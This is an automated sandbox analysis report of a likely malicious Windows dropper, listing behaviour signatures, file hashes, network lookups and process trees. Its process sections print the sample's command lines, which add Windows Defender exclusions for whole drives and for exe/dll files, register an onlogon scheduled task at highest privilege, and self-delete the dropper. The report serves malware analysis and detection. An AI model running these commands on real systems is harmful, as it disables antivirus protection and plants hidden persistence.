Analysis Overview
SHA256
5f87e339571e6fad52ee59bb9f47bcea7a929187153fe73e2c6bf6f686c346be
Threat Level: Likely malicious
The file 89bf9535900487968f2c9282bc739f78_JaffaCakes118 was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-03 05:00
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-03 05:00
Reported
2024-11-03 05:03
Platform
win7-20241010-en
Max time kernel
128s
Max time network
127s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\mbuilder.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\system32\mbuilder.exe
"C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
Files
C:\Windows\mbuilder.exe
| MD5 | 0febccd878b78d6a42ea449dd2f8bca9 |
| SHA1 | 7edd6245882138e3b5211ff9ea98d59e3cf5371a |
| SHA256 | a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11 |
| SHA512 | 00949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523 |
memory/2324-4-0x000007FEF5833000-0x000007FEF5834000-memory.dmp
memory/2324-5-0x000000013F2A0000-0x000000013F48C000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4FIMNYIQ5MCYM0VI3FL6.temp
| MD5 | f8356ac9a42cb4d9953ab60a51da8067 |
| SHA1 | 7cf5b6912b66d1bdbfb1f1f0e2c3c17b7820b337 |
| SHA256 | 2e85095b15e6f9876c5ef74bb9581df7ff372fb671ff4fa219a2bbc25fdf7ef0 |
| SHA512 | abd88d00b9b5c749bbeed0cd8e6e4900d73dcd42a5a133e6bf12fd856f68de7d53446be57ec82b5249b51d55b2dc3ec4b04cd1d3e08b9bdb77b278be005241a6 |
memory/2812-12-0x000000001B240000-0x000000001B522000-memory.dmp
memory/2812-13-0x00000000023D0000-0x00000000023D8000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | f2d36cd608bb92d0096c59ee8ce8345e |
| SHA1 | f0f0a158c540718f74791512b565287968a61f6a |
| SHA256 | db51255e061e2e55ad9b57a88a88a61a1bfa6bfb3a8796f51b48e5c35a5175fb |
| SHA512 | 84de23a4085125d00493cfbb0d94d4e2ce0153049c7bf0176bcc69f7fe4becb834c7d75e1c997a5690a3ca2a99c82c5607168095773ff557d82fbbad65f7ac21 |
memory/2324-35-0x000007FEF5833000-0x000007FEF5834000-memory.dmp
\Users\Admin\AppData\Local\Temp\svchost32.exe
| MD5 | 0a36dbea88311baeb376ff6fb3ea0a3a |
| SHA1 | 100d0b18060351080e63c3e920017056bc6ad9ee |
| SHA256 | a3d218dbf74614c2beacec478f3d04160e2757022303a105c6a7fe25d044ff6b |
| SHA512 | ad329ddc01dfd4137964aab22de4471f687e44fe2bce98e1efce04f70074d38ba650d59b33fa8430035c54be401f4f751ea94b5ef0ccf60e6b0eb24d816087d8 |
memory/1508-41-0x000000013F570000-0x000000013F75A000-memory.dmp
memory/2508-48-0x000000013F1F0000-0x000000013F3DC000-memory.dmp
memory/1056-55-0x000000001B3E0000-0x000000001B6C2000-memory.dmp
memory/1056-56-0x00000000022F0000-0x00000000022F8000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 2ecd7461cdcd8f331d90b44e9854faf2 |
| SHA1 | d714f3038e051503c9ad6915cc28c2304617dda8 |
| SHA256 | 63ff90cbf00b00721be8bc808c796de2635d90f391ddf5882ee68eecc52eac6f |
| SHA512 | dc3de7568b7a484141254745b5dc63b2d6207f1a1e8c3d7a1a100b462f83f1dd0a9f83d4686797ac8e4ca0f29aa210db697af8cd4e264ffc9e3d16ae15d24ae8 |
memory/936-62-0x000000001B440000-0x000000001B722000-memory.dmp
memory/936-63-0x0000000001F90000-0x0000000001F98000-memory.dmp
memory/1284-80-0x000000013F360000-0x000000013F54A000-memory.dmp
memory/1740-87-0x000000013F7D0000-0x000000013F7D6000-memory.dmp
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
| MD5 | ecd7d7be630be740725bb52e73dafec0 |
| SHA1 | 7def3f5a97ffbd07ad81357262b0c0b49859276d |
| SHA256 | 76b4687442dd515b5e7399abb4a4f603b0634c37ff6b47ed51efae68e0d71706 |
| SHA512 | 412d282c9018c909ea15f6aa2f1651eb4f46ed332b6084f17b58ada74b685a1d357cc71debed5b027973e84760cb6f2d7acd0e759e5850f7c261af472b3bab45 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-03 05:00
Reported
2024-11-03 05:03
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\mbuilder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mbuilder.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\mbuilder.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| N/A | N/A | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File opened for modification | C:\Windows\system32\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
| File created | C:\Windows\system32\Microsoft\Telemetry\sihost32.exe | C:\Users\Admin\AppData\Local\Temp\svchost32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\mbuilder.exe | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\89bf9535900487968f2c9282bc739f78_JaffaCakes118.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
C:\Windows\SysWOW64\cmd.exe
cmd /c start C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\mbuilder.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\system32\mbuilder.exe
"C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\cmd.exe
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Users\Admin\AppData\Local\Temp\svchost32.exe
C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\mbuilder.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"' & exit
C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
"C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "mbuilder" /tr '"C:\Windows\system32\mbuilder.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.27.171.150.in-addr.arpa | udp |
Files
C:\Windows\mbuilder.exe
| MD5 | 0febccd878b78d6a42ea449dd2f8bca9 |
| SHA1 | 7edd6245882138e3b5211ff9ea98d59e3cf5371a |
| SHA256 | a9add30083b1b937144f9933e673062067566df458c605d9b4c817b848325e11 |
| SHA512 | 00949836978dcf133db10e1d04c4513b97eb69d651e781eb91ec1b4b2533cdd1fa7fff39f53bc46bd888b53e55607531c3f50ac1024c182ecc313cf29fcf1523 |
memory/532-4-0x0000000074E7E000-0x0000000074E7F000-memory.dmp
memory/1236-5-0x00007FFF46493000-0x00007FFF46495000-memory.dmp
memory/1236-6-0x0000000000F40000-0x000000000112C000-memory.dmp
memory/532-7-0x00000000025F0000-0x0000000002626000-memory.dmp
memory/532-11-0x00000000025A0000-0x00000000025B0000-memory.dmp
memory/532-10-0x00000000025A0000-0x00000000025B0000-memory.dmp
memory/1236-9-0x00007FFF46490000-0x00007FFF46F51000-memory.dmp
memory/532-8-0x0000000004C90000-0x00000000052B8000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_euyzam0r.0k1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3576-17-0x0000017FE5140000-0x0000017FE5162000-memory.dmp
memory/532-22-0x0000000004BC0000-0x0000000004BE2000-memory.dmp
memory/532-23-0x00000000054B0000-0x0000000005516000-memory.dmp
memory/532-24-0x0000000005520000-0x0000000005586000-memory.dmp
memory/532-34-0x0000000005590000-0x00000000058E4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/532-38-0x0000000005B80000-0x0000000005B9E000-memory.dmp
memory/532-39-0x0000000005BB0000-0x0000000005BFC000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dbb22d95851b93abf2afe8fb96a8e544 |
| SHA1 | 920ec5fdb323537bcf78f7e29a4fc274e657f7a4 |
| SHA256 | e1ee9af6b9e3bfd41b7d2c980580bb7427883f1169ed3df4be11293ce7895465 |
| SHA512 | 16031134458bf312509044a3028be46034c544163c4ca956aee74d2075fbeb5873754d2254dc1d0b573ce1a644336ac4c8bd7147aba100bfdac8c504900ef3fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
